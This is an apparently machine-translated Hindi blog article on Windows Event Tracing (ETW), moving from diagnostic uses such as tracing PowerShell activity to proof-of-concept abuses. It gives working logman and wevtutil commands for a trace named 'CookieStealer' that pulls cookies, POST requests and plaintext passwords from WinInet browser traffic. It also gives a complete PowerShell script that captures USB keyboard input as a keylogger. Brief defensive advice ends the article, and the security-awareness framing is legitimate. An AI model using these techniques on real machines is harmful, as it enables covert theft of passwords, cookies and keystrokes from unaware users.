PowerShell स्निफ़र और दूरस्थ सर्वर से बूट डेटा एकत्र करने के बारे में पिछले लेखों में , मैंने पहले ही ETW (विंडोज के लिए इवेंट ट्रेसिंग) क्षमताओं के बारे में थोड़ा लिखा था। आज मैं इस तकनीक के बारे में अधिक बात करना चाहता हूं।

उसी समय, मैं HTTPS का उपयोग करके और PowerShell पर एक keylogger बनाकर दिखाऊंगा कि इसे अच्छे के लिए कैसे इस्तेमाल किया जा सकता है। या वास्तव में अच्छे के लिए नहीं।

ETW के साथ काम करें

विंडोज के लिए ईवेंट ट्रेसिंग विंडोज सिस्टम कंपोनेंट्स और थर्ड-पार्टी एप्लिकेशन से संदेश एकत्र करता है और भेजता है। यह विंडोज 2000 के दिनों में वापस दिखाई दिया, लेकिन अगर उन दिनों में कई दर्जन सिस्टम प्रदाता थे, तो अब उनका स्कोर पहले से ही सैकड़ों में है। संदेशों का उपयोग त्रुटियों के निदान और सॉफ़्टवेयर प्रदर्शन समस्याओं को हल करने के लिए आसानी से किया जाता है।

कुछ सिस्टम प्रदाता पहले से ही डिफ़ॉल्ट रूप से विंडोज इवेंट लॉग में लिखते हैं, और कुछ अलग से शामिल किए जाते हैं। तो भले ही आपको ETW के बारे में पता न हो, आप शायद इसका इस्तेमाल करते हैं। आप लॉग से परिचित हो सकते हैं और उनमें से कुछ को सक्षम कर सकते हैं यदि आवेदन और सेवा लॉग में मानक इवेंट व्यूअर में आवश्यक हो। पत्रिका के बारे में थोड़ा और इसके साथ काम करने के बारे में लेख में पाया जा सकता है " हम लॉग को घुमाते हैं जैसे हम चाहते हैं - विंडोज सिस्टम में लॉग का विश्लेषण "।

आप मौजूदा प्रदाताओं की सूची देख सकते हैं जो केवल हमें यह बताने के लिए खुश हैं कि लॉगमैन क्वेरी प्रोवाइडर कमांड के साथ उनके साथ क्या हो रहा है।

ETW प्रदाता।

आप उन प्रदाताओं की सूची देख सकते हैं जो एक विशिष्ट विंडोज प्रक्रिया से जुड़े हैं (और, इसलिए, इसके बारे में कुछ सीखें) लोगमैन क्वेरी प्रोवाइडर्स -पिड <प्रक्रिया PID> कमांड का उपयोग करके ।

एक नियमित नोटबुक से जुड़े प्रदाताओं की सूची।

आप एक विशेष प्रदाता की घटनाओं के लिए सदस्यता को सक्षम कर सकते हैं या न्यू-नेटइवेंटसेंशन cmdlet का उपयोग करके PowerShell के माध्यम से ट्रेस कर सकते हैं। और आप "कंप्यूटर प्रबंधन" - "प्रदर्शन" - "डेटा कलेक्टरों के समूह" पथ पर माउस के साथ भी क्लिक कर सकते हैं। यहां, इवेंट ट्रैकिंग सत्रों में, आप देख सकते हैं कि कौन से निशान चल रहे हैं, और यदि आप चाहें तो अपना खुद का कलेक्टर बना सकते हैं।

दौड़ने के निशान।

आप उपयोग और उपयोगिता सेट जैसे Microsoft संदेश विश्लेषक , विंडोज प्रदर्शन टूलकिट या यहां तक ​​कि PowerShell Get-WinEvent cmdlet का उपयोग करके परिणाम देख सकते हैं ।

मैं सुझाव देता हूं कि आप Microsoft प्रलेखन में ETW की विशेषताओं को पढ़ें, आप लगभग ईवेंट ट्रेसिंग अनुभाग के साथ शुरू कर सकते हैं। मैं कुछ अच्छी सामग्री की सिफारिश कर सकता हूं " हम ईटीडब्ल्यू का अध्ययन करते हैं और मुनाफा निकालते हैं "।

चूंकि ETW कर्नेल स्तर पर काम करता है, इसलिए यह संदेश हस्तांतरण की गति और किसी भी ड्राइवर को स्थापित करने की आवश्यकता के अभाव या अनुप्रयोगों में इंजेक्ट होने से अलग है। आमतौर पर, ETW का उपयोग प्रदर्शन और एप्लिकेशन समस्याओं के निदान के लिए किया जाता है। उदाहरण के लिए, लेख " मौज-मस्ती और लाभ के लिए विंडोज बूट तेज करना " उन कारकों का विश्लेषण करता है जो लोडिंग की मंदी को प्रभावित करते हैं, और लेख में 24-कोर सीपीयू और मैं अपने माउस को स्थानांतरित नहीं कर सकता - साधारण ऑपरेशन पर विंडोज को धीमा करने का कारण। मैं आपको एक उदाहरण देता हूं - पॉवरशेल cmdlet रन विश्लेषण।

पॉवरशेल देखना

मान लीजिए कि किसी तरह से (उदाहरण के लिए, प्रक्रिया स्टार्टअप के ऑडिट के माध्यम से), आपको लगता है कि आपके कंप्यूटर पर स्लेड प्रोसेस और पॉवरशेल स्क्रिप्ट चल रहे हैं। उनकी गतिविधि का विश्लेषण करने के लिए ईटीडब्ल्यू का उपयोग करने के लिए एक तकनीक होगी। उदाहरण के लिए, PowerShell प्रदाता को देखें। कमांड के साथ ट्रेसिंग चालू करें:

logman start pstrace -p Microsoft-Windows-PowerShell -oc:\temp\pstrace.etl -ets 

अब प्रतीक्षा करें कि जब तक समझ से बाहर की स्क्रिप्ट काम न करें, कमांड के साथ ट्रेस रोक दें:

 logman stop pstrace -ets 

अब आप ट्रेस देख सकते हैं, उदाहरण के लिए, Microsoft संदेश विश्लेषक के माध्यम से।

संदेहास्पद clean.ps1 स्पष्ट रूप से कुछ को खोजता है और हटाता है।

यदि आप वांछित लाइन का चयन करते हैं, तो निचले पैनल में घटना के बारे में विस्तारित जानकारी होगी।

आह, यह 1C कैश को साफ़ करने के लिए एक ही स्क्रिप्ट है!

इस बार सब कुछ ट्राइट हो गया। लेकिन अधिक जटिल मामलों में, आप अन्य गतिविधियों की जाँच के लिए ट्रेस चला सकते हैं:

• नेटवर्क गतिविधि;
• डीएनएस संकल्प
• डिस्क का उपयोग;
• स्मृति के साथ काम करें;
• डब्ल्यूएमआई गतिविधि
• और भी बहुत कुछ।

इस तरह, ETW मैलवेयर को पकड़ने और यह समझने में मदद कर सकती है कि एप्लिकेशन कैसे काम करते हैं। कुछ स्थानों पर, यह सामान्य प्रक्रिया मॉनिटर की तुलना में अधिक जानकारीपूर्ण है। लेकिन अच्छे कामों के अलावा, तंत्र का एक "अंधेरा" पक्ष है।

बेशक, आप एक हथौड़ा से मार सकते हैं और बंदूक से बचा सकते हैं। बेशक, मैं तंत्र का नैतिक मूल्यांकन नहीं करूंगा, लेकिन किसी भी मामले में, दिलचस्प अवसर खुलते हैं।

मैं प्रूफ़-ऑफ़-कॉन्सेप्ट के रूप में कुछ उदाहरण दूंगा

एस का मतलब सुरक्षित है

इस उदाहरण में, मैं दिखाऊंगा कि HTTPS पर भी, यह पता लगाना कितना आसान है कि कोई उपयोगकर्ता इंटरनेट पर क्या देख रहा है। आप इसे बिना PowerShell - केवल एक माउस, केवल कट्टर के देख सकते हैं। हमारे कार्य में एक उपयोगकर्ता होगा, विंडोज होगा, इंटरनेट एक्सप्लोरर और एक इवेंट लॉग होगा।

आइए Wininet इवेंट लॉग को चालू करके शुरू करें। यह निम्नानुसार किया जाता है: ईवेंट लॉग खोलें, "देखें" टैब पर, विश्लेषणात्मक और डीबग लॉग के प्रदर्शन को सक्षम करें।

इच्छित लॉग का प्रदर्शन जोड़ें।

उसके बाद, संदर्भ मेनू में UseLog सक्षम करें, और यह आवश्यक जानकारी प्राप्त करने के लिए पर्याप्त है। आइई का उपयोग करें और लॉग देखें:

WinInet पत्रिका।

दरअसल, पत्रिका हेडर में और खोज इंजन के लिए एक सीधा अनुरोध दिखाई देता है।

हेडर के अलावा, आप कुकीज़ को बाहर निकालने के लिए लॉगबुक का भी उपयोग कर सकते हैं, और साथ ही POST अनुरोधों को भी देख सकते हैं - उदाहरण के लिए, क्रेडेंशियल्स को खींचने के लिए। तकनीक किसी भी एप्लिकेशन पर काम करती है जो इंटरनेट के साथ काम करने के लिए wininet.dll का उपयोग करती है। उदाहरण के लिए, एज ब्राउज़र।

वही आसानी से PowerShell पर लागू किया जाता है, और यहां तक ​​कि cmd पर भी। मैं पिछले कार्यान्वयन का एक उदाहरण दूंगा।

सबसे पहले, एक ट्रेस बनाएं:

 logman start CookieStealer -p Microsoft-Windows-WinInet -oc:\temp\cookiesteal.etl -ets 

अब ब्राउजर में काम करते हैं, मेल चेक करते हैं। ट्रेसिंग को फिर कमांड से रोका जा सकता है:

 logman stop CookieStealer -ets 

सबसे सरल विश्लेषण wevtutil.exe कमांड उपयोगिता का उपयोग करके किया जा सकता है। उदाहरण के लिए, POST अनुरोधों को देखने के लिए, कमांड होगी:

 wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST" 

तुम भी बेतरतीब ढंग से शब्द पासवर्ड के लिए खोज और परिणाम प्राप्त करने की कोशिश कर सकते हैं।

सादे पाठ में पासवर्ड। बहुत गुस्सा आ रहा है।

यह ध्यान देने योग्य है कि एंटीवायरस एक ही समय में चुप था। वास्तव में, यह एक सामान्य अनुरेखण प्रक्रिया है।

बेशक, WinInet ईवेंट का उपयोग समस्याओं के निदान के लिए किया जा सकता है जैसे "यह साइट क्यों नहीं खुलती है और क्या होता है।" फिर भी, संभावनाएं काफी दिलचस्प हैं। मैं और भी अधिक मुड़ उदाहरण की ओर मुड़ता हूं।

PowerShell पर Keylogger। क्योंकि मैं कर सकता हूँ।

विंडोज पर दो दिलचस्प ETW प्रदाता हैं:

• Microsoft-Windows-USB- UCX (36DA592D-E43A-4E28-AF6F-4BC57C5A11E8) - USB 2.0 के साथ काम करता है।

  
  

• Microsoft-Windows-USB-USBPORT (C88A4EF5-D048-4013-9408-E04B7DB2814A) - USB 3.0 के साथ काम करता है।

  
  

उनकी मदद से, आप एचआईडी डेटा प्राप्त कर सकते हैं जो कि एक यूएसबी डिवाइस जैसे कि कीबोर्ड या माउस ट्रांसफर करता है। डेटा कच्चे पर कब्जा कर लिया है, लेकिन छिपाई विनिर्देश के लिए धन्यवाद , इसे आसानी से पढ़ा जा सकता है।

ट्रेसिंग शुरू करने के लिए, बस निम्नलिखित कमांड निष्पादित करें:

 logman start "usbtrace" -p "microsoft-windows-usb-usbport" -o "c:\temp\usbtrace.etl" -ets 

और डेटा को PowerShell cmdlet के साथ प्राप्त किया जा सकता है:

 $Input=get-winevent –path "c:\temp\usbtrace.etl" –oldest | where {$_.message –match "Data"} 

मैं एक सरल स्क्रिप्ट का एक उदाहरण दूंगा जो ट्रेस डेटा को पढ़ता है और उन्हें पठनीय मूल्यों में परिवर्तित करता है। रूपांतरण केवल अंग्रेजी अक्षरों और विशेष रूप से बड़े अक्षरों में किया जाता है।

 $source = "C:\temp\trace.etl" $destination= "C:\temp\Output.txt" $tracetime = "10" logman start usbtrace -p microsoft-windows-usb-usbport -o $source -ets sleep $TraceTime logman stop usbtrace -ets $Input=get-winevent –path $Source –oldest | where {$_.message –match "Data"} $HID = Foreach ($I in $Input) {('{0:x}' -f ($I.properties.value[5]))} $Data=switch ($HID) { 4 {"A"} 5 {"B"} 6 {"C"} 7 {"D"} 8 {"E"} 9 {"F"} A {"G"} B {"H"} C {"I"} D {"J"} E {"K"} F {"L"} 10 {"M"} 11 {"N"} 12 {"O"} 13 {"P"} 14 {"Q"} 15 {"R"} 16 {"S"} 17 {"T"} 18 {"U"} 19 {"V"} 1A {"W"} 1B {"X"} 1C {"Y"} 1D {"Z"} } $Data | out-file "$Destination" get-content "$Destination" del "$source" del "$Destination" 

जब लॉन्च किया जाता है, तो स्क्रिप्ट 10 सेकंड के लिए ट्रेस पर मुड़ जाती है, फिर परिणाम दिखाती है।

स्क्रिप्ट का नतीजा।

बेशक, HID डेटा को समझने के बाद, आप स्क्रिप्ट को एक पूर्ण keylogger में परिशोधित कर सकते हैं जो कीबोर्ड और माउस से डेटा रिकॉर्ड करेगा। यह इस तंत्र की सीमाओं को ध्यान देने योग्य है:

• केवल USB के साथ काम करता है, और PS \ 2 (जैसा कि कभी-कभी लैपटॉप में पाया जाता है) समर्थित नहीं है;
• यूएसबी 3.0 समर्थन की घोषणा केवल विंडोज 8 और इसके बाद के संस्करण में की जाती है;
• प्रशासक अधिकार (UAC) की आवश्यकता है।

लेकिन कोई ड्राइवर और इंटरसेप्टर नहीं। खैर, निश्चित रूप से, दुर्भावनापूर्ण उपयोग के अलावा, इस तरह के एक कीगलर कीबोर्ड के साथ समस्याओं का निदान करने में मदद कर सकता है। सैद्धांतिक रूप से।

क्या मुझे डरने की जरूरत है

यहां तक ​​कि खलनायक के हाथों में अंतर्निहित तंत्र परेशानी पैदा कर सकता है। सुरक्षा के तरीके समान रहते हैं: निष्पादन योग्य फ़ाइलों को सिस्टम निर्देशिकाओं से ब्लॉक न करें, व्यवस्थापक विशेषाधिकारों वाले उपयोगकर्ता के रूप में काम न करें, और यदि वे काम करते हैं, तो कम से कम यूएसी को अक्षम न करें। और, ज़ाहिर है, सुरक्षा के संदर्भ में अंतर्निहित विंडोज ब्राउज़र सवाल उठाते हैं।